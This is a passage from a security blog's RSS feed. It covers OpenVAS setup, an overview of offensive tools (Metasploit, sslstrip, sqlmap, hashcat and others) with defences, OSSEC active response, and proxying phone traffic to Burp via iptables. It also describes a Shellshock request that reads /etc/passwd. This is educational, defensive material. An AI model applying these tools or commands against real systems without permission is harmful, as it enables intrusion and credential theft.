https://192.168.1.254:4000

Getting Started with OpenVAS 9

After completing the installation and syncing the vulnerability feed. Login to the web interface using the default credentials (don't forget to change your password!).

1. Add a target

Using the web interface select Configuration | Targets to add a new target to scan. Note the little star icon in the top left corner is the "add" button (this follows through on the other screens as well.

2. Add a task

Select Scans | Tasks option to now add a new task. For your first scan you can stick with the defaults, simply select the scan target that you added in step 1 and hit create.

3. Start Scan

Now it is simply a matter of hitting the play button for the task to kick the scan off. Once the scan has completed you will be able to review results under Scans | Reports. Reports can be downloaded in HTML / XML / PDF and other formats or you can review the results in the web interface.

Sample OpenVAS Reports

Each of the following tests were conducted using a black box approach. In such a test the vulnerability scanner is ran against a target with no prior knowledge or credentialed access to the system.


Windows 2003
End of life and an impressive list of vulnerabilities in a default install. Probably should upgrade.
Download


Windows 7
In this test the firewall has been disabled. Multiple issues discovered including MS17-010.
Download


Metasploitable
This target is a deliberately insecure system. It is used for testing and has many critical vulnerabilities.
Download

Wrapping Up

The installation of OpenVAS 9 on Ubuntu was found to be a smooth process, with no hiccups or gotchas encountered. The OpenVAS project is heavily supported and developed by Greenbone Networks, if you are after a comprehensive vulnerability scanning solution you should check them out. Complement their appliances for testing your Internal corporate networks with our hosted vulnerability scanners to secure the network perimeter.

Have you seen our Free IP and Network Reconnaissance tools.
Discover, Explore, Learn.

Use our hosted OpenVAS service for securing your Internet facing systems.

The post OpenVAS 9 install on Ubuntu 16.04 appeared first on HackerTarget.com.

]]>
11 Offensive Security Tools for SysAdmins https://hackertarget.com/11-offensive-security-tools/ Tue, 27 Sep 2016 11:44:32 +0000 http://hackertarget.com/?p=3796 Offensive security tools are used by security professionals for testing and demonstrating security weakness. Systems Administrators and other IT professionals will benefit from having an understanding of at least the capabilities of these tools. Benefits include preparing systems to defend against these types of attacks and being able to identify the attacks in the case […]

The post 11 Offensive Security Tools for SysAdmins appeared first on HackerTarget.com.

]]>
Offensive security tools are used by security professionals for testing and demonstrating security weakness. Systems Administrators and other IT professionals will benefit from having an understanding of at least the capabilities of these tools. Benefits include preparing systems to defend against these types of attacks and being able to identify the attacks in the case of an incident.

This selection of tools when utilized by a moderately skilled attacker has the potential to wreak havoc on an organizations network.

If you are interested in testing these tools they are all available to download and use for FREE. Most are open source with a couple of exceptions. They should not be used against systems that you do not have permission to attack. You could end up in jail.

The mitigation's listed for each tool are high level pointers to techniques that a systems administrator should consider for defending against these powerful tools. Further information can be found at the project sites for each of the tools.

While some of the recommendations may appear to be common sense; far too often the basics are overlooked.

MetaSploit Framework
Metasploit Framework - an open source tool for exploit development and penetration testing Metasploit is well known in the security community. Metasploit has exploits for both server and client based attacks; with feature packed communication modules (meterpreter) that make pwning systems fun! The framework now includes Armitage for point and click network exploitation. This is the go to tool if you want to break into a network or computer system.

Defending against Metasploit:

  • Keep all software updated with the latest security patches.
  • Use strong passwords on all systems.
  • Deploy network services with secure configurations.
Ettercap
Ettercap - a suite of tools for man in the middle attacks (MITM). Once you have initiated a man in the middle attack with Ettercap use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords are just the beginning; inject to exploit FTW!

Defending against Ettercap:

  • Understand that ARP poisoning is not difficult in a typical switched network.
  • Lock down network ports.
  • Use secure switch configurations and NAC if risk is sufficient.
SSLStrip
sslstrip - using HTTPS makes people feel warm, fuzzy and secure. Using sslstrip this security can be attacked, reducing the connection to an unencrypted HTTP session, whereby all the traffic is readable. Banking details, passwords and emails from your boss all in the clear. Even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock just to make the user keep that warm and fuzzy feeling.

Defending against sslstrip:

  • Be aware of the possibility of MITM attacks (arp, proxies / gateway, wireless).
  • Look for sudden protocol changes in browser bar. Not really a technical mitigation!
Evilgrade
evilgrade - another man in the middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not so good update. Can exploit the upgrade functionality on around 63 pieces of software including Opera, Notepad++, VMware, Virtualbox, itunes, quicktime and winamp! It really whips the llamas ass!

Defending against evilgrade:

  • Be aware of the possibility of MITM attacks (arp attacks, proxy / gateway, wireless).
  • Only perform updates to your system or applications on a trusted network.
Social Engineer Toolkit
Social Engineer Toolkit - makes creating a social engineered client side attack way too easy. Creates the spear phish, sends the email and serves the malicious exploit. SET is the open source client side attack weapon of choice.

Defending against SET:

  • User awareness training around spear phishing attacks.
  • Strong Email and Web filtering controls.
SQLmap
sqlmap - SQL Injection is an attack vector that has been around for over 10 years. Yet it is still the easiest way to get dumps of entire databases of information. Sqlmap is not only a highly accurate tool for detecting sql injection; but also has the capability to dump information from the database and to even launch attacks that can result in operating system shell access on the vulnerable system.

Defending against sqlmap:

  • Filter all input on dynamic websites (secure the web applications).
  • Use mod_proxy or other web based filtering controls to help block malicious injection attacks (not ideal as often able to bypass these web application firewalls (WAF).
Aircrack-NG
aircrack-ng - breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.

Defending against aircrack-ng:

  • Never use WEP
  • When using WPA2 with pre-shared keys, ensure passwords are strong (10+ characters non-dictionary based passwords).
oclHashcat
oclHashcat - Need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms supported. Will use the GPU (if supported) on your graphics card to find those hashes many times faster than your clunky old CPU.

Defending against oclHashcat:

  • Passwords are the weakest link. Enforce password complexity.
  • Protect the hashed passwords.
  • Salt the hashes.
ncrack
ncrack - Brute force network passwords with this tool from Fyodor the creator of Nmap. Passwords are the weakest link and Ncrack makes it easy to brute force passwords for RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet.

Defending against ncrack:

  • Use strong passwords everywhere.
  • Implement time based lockouts on network service password failures.
Cain and Abel
Cain and Abel - Cracking passwords, sniffing VOIP and Man in the Middle (MITM) attacks against RDP are just a few examples of the many features of this Windows only tool.

Defending against Cain and Abel:

  • Be aware of the possibility of MITM attacks (arp attacks, untrusted proxy / gateway, wireless).
  • Use strong passwords everywhere.
Tor Network
Tor - push your traffic through this onion network that is designed to provide anonymity to the user. Note your traffic from the exit node is not encrypted or secured. Make sure you understand what it does before using it, Tor provides anonymity not encrypted communication.

Defending against Tor:

  • It is possible to implement blocking of Tor exit nodes on your firewall, if Tor traffic is linked to a threat to your environment.

If you are interested in testing these offensive security tools you should take a look at the Kali Linux distribution. It includes many of these and other tools pre-installed.

These tools are used by security professionals around the world to demonstrate security weakness.

Only experiment on your local network where you have permission.
Do not do anything stupid. You could end up in jail.

Have you seen our Free IP and Network Testing tools.
Discover, Explore, Learn.

Next level testing with Security Vulnerability Scanners. Trusted tools. Hosted for easy access.

The post 11 Offensive Security Tools for SysAdmins appeared first on HackerTarget.com.

]]>
Enable OSSEC Active Response https://hackertarget.com/enable-ossec-active-response/ Tue, 06 Sep 2016 10:46:57 +0000 https://hackertarget.com/?p=8083 Many OSSEC users start of running with active response disabled to ensure that the OSSEC agent does not affect the server especially when running in a live production environment. Once you have an understanding of the number of alerts and types of alerts you are seeing, it is a good idea to enable active response. […]

The post Enable OSSEC Active Response appeared first on HackerTarget.com.

]]>
Many OSSEC users start of running with active response disabled to ensure that the OSSEC agent does not affect the server especially when running in a live production environment. Once you have an understanding of the number of alerts and types of alerts you are seeing, it is a good idea to enable active response.

The advantages of running OSSEC on your servers are pretty obvious, especially when you start to get few alerts, even if they are false positives. It is a quick and easy way to ensure that any "interesting" changes or security events are noticed by simply sending an email to the configured email address. Blocking is simply the next step in defence. If services are being brute forced, then you can simply block an IP address that is performing the brute force.

An important part of any monitoring system is to minimise the noise that an admin or analyst is subjected too. Reducing the noise ensures that legitimate alerts are noticed and followed up for analysis.

After configuring OSSEC in a default configuration with active response disabled you will need to enable by modifying two sets of configuration parameters in the /var/ossec/etc/ossec.conf file.

Add a command block to /var/ossec/etc/ossec.conf, this gives a name to the executable that you are going to run (typically located in /var/osssec/active-response/).

  <command>
    <name>firewall-drop</name>
    <executable>firewall-drop.sh</executable>
    <expect>srcip</expect>
    <timeout_allowed>yes</timeout_allowed>
  </command>

Now enable active response on specific rules or all rules above a certain alert level.

<active-response>
        <disabled>no</disabled>
        <command>firewall-drop</command>
        <agent_id>001</agent_id>
        <location>local</location>
        <rules_id>31510</rules_id>
        <level>8</level>
        <timeout>600</timeout>
</active-response>

Rather than have a specific rule in the active response block the rules_id can be omitted and all rules that are triggered above level 8 with source IP will be blocked by the firewall drop script using iptables for a period of 600 seconds (10 minutes). Note that the command block needs to be higher in the ossec.conf file than the active response block.

To see how effective your active response is take a look at /var/ossec/logs/active-responses.log. Here is snip it of one of my logs. All the noisy bots are being blocked. Alerts for this noise no longer appear in my inbox as they are simply quietly blocked.

Sun Aug 14 11:55:04 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 192.1xx.250.89 1471175704.407764 31510 Sun Aug 14 12:05:34 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 192.1xx.250.89 1471175704.407764 31510 Sun Aug 14 14:34:25 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 103.255.xx.69 1471185265.450999 31153 Sun Aug 14 14:44:55 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 103.2xx.15.69 1471185265.450999 31153 Mon Aug 15 23:16:49 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 82.166.1xx.x4 1471303009.783488 31510 Mon Aug 15 23:27:19 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 82.1xx.1x9.94 1471303009.783488 31510 Tue Aug 16 11:43:14 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 91.200.1x.x47 1471347794.946259 31510 Tue Aug 16 11:53:45 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh delete - 91.20x.xx2.47 1471347794.946259 31510 Tue Aug 16 11:53:47 UTC 2016 /var/ossec/active-response/bin/firewall-drop.sh add - 91.20x.xx.47 1471348427.992693 31510

That's it folks, I have written about OSSEC before and still find it to be very useful and an important part of any server build.

The post Enable OSSEC Active Response appeared first on HackerTarget.com.

]]>
Proxy your Phone to Burp https://hackertarget.com/proxy-phone-burp/ Tue, 27 Oct 2015 10:02:48 +0000 https://hackertarget.com/?p=7859 In this guide we configure Burp Suite to proxy all the traffic from your phone, tablet or other wifi device. As a bonus you will also have full access to all the WIFI packets for consumption by Wireshark or your traffic analysis tool of choice. Use this traffic analysis technique to hunt bug bounties in […]

The post Proxy your Phone to Burp appeared first on HackerTarget.com.

]]>
In this guide we configure Burp Suite to proxy all the traffic from your phone, tablet or other wifi device. As a bonus you will also have full access to all the WIFI packets for consumption by Wireshark or your traffic analysis tool of choice.

Use this traffic analysis technique to hunt bug bounties in your favorite Android or iOS APP.

What do I need?

An old laptop with an Ethernet port and a Wireless adapter
Ubuntu running on the old laptop. Any Linux will do, but this guide will show you with Ubuntu 14.04
Burp running on any computer on your local network

Here is how it works

1. Configure the laptop as a Wireless Router

Hook the laptop up to the local network using the Ethernet adapter and make sure you can browse the Internet (using the Ethernet adapter).

Configure using Network Manager a new wireless network in infrastructure mode
1. untick the enable wifi option to temporarily disable the WIFI
2. select edit connections
3. add new wireless network (set ssid and mode to infrastructure)

4. name the access point (mytestingaccesspoint)
5. in IPv4 change method to "Shared to other computers", this is a quick way to sort out DHCP and NAT for your new wireless network.

6. set security (set a password)

Edit the file /etc/NetworkManager/system-connections/mytestingaccesspoint

Find the line that has mode=infrastructure and change it to mode=ap. This is required as AP is not an option in Network Manager. Note that not all wireless cards support the AP mode.

Once you have this network (mytestingaccesspoint) enabled, your wireless devices should be able to see it and connect using the password you have set.

If you can browse the network from your mobile device, on your laptop you will see two different IP ranges for your wireless adapter (wlan0) and the ethernet (eth0) adapter. The Ubuntu laptop is forwarding the traffic from the new wireless network onto the Ethernet network and out to the internet.

Try tcpdump -i wlan0 on the laptop. Fire up some apps on your phone or a browser. You should see traffic; this is your mobile device traffic. If your wireless device is not wlan0 you will need to use the correct device in the forward rule below so make sure this works.

2. Forward Traffic to Burp for Transparent Proxying

That concludes the first part of the guide, getting the mobile device traffic to route through a Linux enabled system. Now in the second part of the guide we will simply use an iptables NAT table rule to forward all HTTP port 80 traffic to the Burp Proxy running on another system.

Once we get the HTTP traffic into the Burp proxy server we can view, intercept and even inject on HTTP requests.

It only takes one line, on your Linux based router (the laptop).

iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to 192.168.1.100:8080

Now in Burp you need to set the proxy to listen on all IP addresses and there are two other options that are required for transparent proxying.

Note that with these changes you are opening up Burp Suite, make sure you understand the changes.

1. Select the Proxy Tab | Options | Edit the Running Proxy | Change to Bind All interfaces

2. While you are here select "Request Handling" and tick the option to Support invisible proxying (if you need this). Without it you will likely get an error when you attempt to proxy the HTTP traffic transparently.

3. Still on the Proxy Options Tab, scroll down to the bottom and select the "Allow Requests to web interface using fully qualified DNS hostnames"

dd-wrt as an alternative

If you have a compatible router you might be able to use dd-wrt or other firmware project to install Linux on your SOHO router. With Linux on your router you could use a similar port forward rule to push port 80 traffic to burp. There are lots of options available, one of the advantages of the old laptop method is if you mess up on the Laptop the rest of the household can still use the Internet (unless of course you really mess it up). Have fun... 🙂

The post Proxy your Phone to Burp appeared first on HackerTarget.com.

]]>
Exploring the Hacker Tools of Mr Robot https://hackertarget.com/hacker-tools-mr-robot/ https://hackertarget.com/hacker-tools-mr-robot/#comments Fri, 21 Aug 2015 11:51:37 +0000 https://hackertarget.com/?p=7756 The debut season of Mr Robot has received a nod from the security focused twitters for its attempts at trying to keep things for the most part realistic. In the episodes so far we have seen hacker types communicating using IRC, there are Linux boxes as far as the eye can see and the main […]

The post Exploring the Hacker Tools of Mr Robot appeared first on HackerTarget.com.

]]>

Over the years the most famous hacking tool that has made it into the movies is Nmap. When producers of a movie actually try to put a dose of reality into the computer hacking scenes Nmap will often flash up on the screen. AFAIK Trinity was the first in the Matrix. Nmap has also appeared in Elysium, The Bourne Ultimatum, Die Hard 4 and many others

The debut season of Mr Robot has received a nod from the security focused twitters for its attempts at trying to keep things for the most part realistic. In the episodes so far we have seen hacker types communicating using IRC, there are Linux boxes as far as the eye can see and the main character wears a hoodie. Of course it is a television show that has to be entertaining so we have to give them some slack in getting a bit creative. So far they seem to be doing a pretty good job at maintaining a balance between the story and what is technically possible.

Here is a quick overview of some of the tools that have appeared in the show so far.

Kali Linux

In multiple scenes we can see references to the Kali Linux distribution, a complete operating system that has been packaged with configured and ready to use penetration testing (hacking) tools. If you are interested in learning about network security, get a copy of this and start playing! ** Only in your lab network of course! Breaking into computers you do not own is illegal in most parts of the world **.

Wget, Shellshock and John the Ripper

Wget is a terminal program to make HTTP requests, a popular use case is to simply download the source of a web page or grab a file from a web server in a terminal.

Here this handy tool is used to compromise a system using one of the big vulnerabilities of 2014 the shellshock bug. You can see the commands being sent in the User Agent of the request to the web server, the command in the screen shot is simply cat /etc/passwd.

While success was achieved here getting the /etc/passwd file, without the /etc/shadow file that contains the password hashes the next line where John the Ripper is launched is never going to work.


Canbus Hacking

Car hacking has really hit the big time recently after computer security researchers remotely hacked into and took control of a Jeep as it was driving down the freeway. Canbus hacking has been around for a number of years and both car enthusiasts and security researchers have been poking around to gain access to the computers that control the modern car.

In the screen shot from Mr Robot we can see candump, one of the Linux utilities used for viewing the canbus messages.


USB in the car park

We see in this scene one of the few Windows desktops shown - during this scene a security guard inserts a USB drive found in the car park into his system infecting his Windows XP machine with malware. Leaving infected USB flash drives in the car park of the target organization is a well known trick to get code onto a system where network access is limited. In this instance the malware is caught by AVAST anti-virus.

Bluetooth Scanner (btscanner)

btscanner is used here to probe the targets phones for bluetooth capabilities. The tool attempts to extract as much information as possible from a Bluetooth device without having to pair. The btscanner program is included in the Kali Linux distribution and we can see from the title bar of the window that it is the operating system being used here.

Bluesniff

In this screenshot bluesniff can be seen, this is another tool for attacking bluetooth enabled devices. In this screen shot the actual plan here is to perform a man in the middle attack against the targets bluetooth keyboard. With keyboard access the next move is to drop a Meterpreter shell onto the system for access to the target network.

Metasploit Framework (Meterpreter)

In this shot we can see a few lines from a Meterpreter shell. Anyone who has used this tool knows a little bit of Meterpreter goes a long way so there was no need for an extensive shot of this powerful tool. Part of the Metasploit penetration testing framework by Rapid7, a Meterpreter shell gives an attacker full control of the target system as well as the ability to move around the network.


Social Engineer Toolkit (SET)

The Social Engineer Toolkit Social Engineer Toolkit or SET is a framework that makes setting up social engineering attacks easier. Email based spear phishing attacks, fake websites and wireless access points can all be launched through its menu system. In this case they are using the SMS spoofing module.

Netscape Navigator the hackers browser of choice

Windows 95 and Netscape Navigator are mentioned when the lead character is thinking about his first steps as a hacker. In the screen shot you can see the source being viewed... careful if you see someone viewing the source they are no doubt a dangerous hacker. The humble web browser is actually a very useful tool for an attacker whether they are launching web application attacks or researching LinkedIn for social engineering attacks.

There you go a bit of fun for the end of the week. If you are after more information on any of the tools explore the included links or try searching. The great thing about all these open source tools is there are lots of tutorials and documentation available.

It is refreshing to see a television show making an effort to not only highlight capabilities of current hacking techniques but trying to stay reasonably close to reality.

Know Your Attack Surface
Don't miss the low hanging fruit

The post Exploring the Hacker Tools of Mr Robot appeared first on HackerTarget.com.

]]>
https://hackertarget.com/hacker-tools-mr-robot/feed/ 52